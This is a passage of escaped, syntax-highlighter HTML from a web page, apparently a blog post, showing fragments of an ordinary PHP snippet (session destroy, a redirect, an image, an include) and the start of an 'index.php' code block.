transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-103&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;session_destroy&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-104&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;&amp;lt;script&amp;gt;location.href='./';&amp;lt;/script&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-105&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-106&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-107&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-108&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;ㅋ&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;rystal&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;h3&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-109&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;img &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;src&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;./images/k_03.jpg&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;width&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;430&quot;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-i&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;style&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;position:fixed;&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;p&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-110&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-111&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a5a263262138-112&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;4bbc327f5b0fd076e005961bcfc4a9ee.php&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a5a263262138-113&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;index.php&lt;/strong&gt;&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a7b199319094&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 